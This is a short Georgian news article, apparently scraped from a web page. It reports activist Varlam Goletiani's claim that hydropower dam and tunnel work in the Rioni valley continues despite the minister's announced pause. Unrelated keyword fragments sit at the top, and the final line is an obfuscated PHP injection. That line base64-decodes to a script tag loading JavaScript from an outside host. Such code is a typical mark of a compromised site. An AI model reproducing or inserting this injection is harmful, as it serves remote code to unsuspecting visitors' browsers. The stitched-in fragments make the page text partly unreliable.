celsiusi
ავერსი საქკაბელი

მოძრაობის რიონის ხეობის გადარჩენისთვის დამფუძნებელი ვარლამ გოლეთიანი აცხადებს, რომ რიონის ხეობაში ჰესის მოსამზადებელი სამუშაოები არ შეჩერებულა და კაშხლის ტანის მშენებლობის პროცესი მიმდინარეობს. 

 
როგორც ვარლამ გოლეთიანმა ფეისბუქ-ლაივის დროს აღნიშნა, ხელისუფლება ცრუობს, როდესაც ამბობს, რომ მშენებლობა კვლევების გადამოწმების შემდეგ გაგრძელდება. 
 
“როდესაც საუბარია იმაზე, რომ თითქოს კაშხლის მშენებლობაზე მორატორიუმი გამოცხადდა და 12 თვე არ აშენდება, ვიდრე კვლევების რევიზირება და ვალიდაცია არ მოხდება, რასაც მინისტრი ამბობს და თითქოს, პასუხისმგებლობით ეკიდებიან ამ პროცესს – ასე გამოჰყავთ ხოლმე საზოგადოების თვალში, რომ სანამ არ გადამოწმდება ყველაფერი, მანამდე კაშხლის მშენებლობა და ჰესის მოსამზადებელი სამუშაოები შეჩერდება, გარდა გზისა, მიმდინარეობს კაშხლის ტანის მშენებლობის პროცესი. გვირაბი გაჰყავთ. აქტიურად მიმდინარეობს სამუშაო პროცესი. საპირისპიროში არწმუნებენ საზოგადოებას სამინისტროსა და სამთავრობო წრეების წარმომადგენლები… აქ ჩვეულებრივ მიმდინარეობს სამუშაო პროცესი – ანგრევს ხეობას ანადგურებს”, – აცხადებს გოლეთიანი  
 
რიონის ხეობის მცველებმა სოციალურ ქსელში გაავრცელეს ჰესის სამშენებლო სამუშაოების ფოტო ვიდეო მასალა.     
 
 
შეგახსენებთ , რომ ეკონომიკისა და მდგრადი განვითარების მინისტრმა ნათია თურნავამ განაცხადა, რომ ამ ეტაპზე ჰესის მშენებლობა შეჩერდებოდა ვიდრე არ გადამოწმდებოდა ყველა დეტალი. 
1652
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");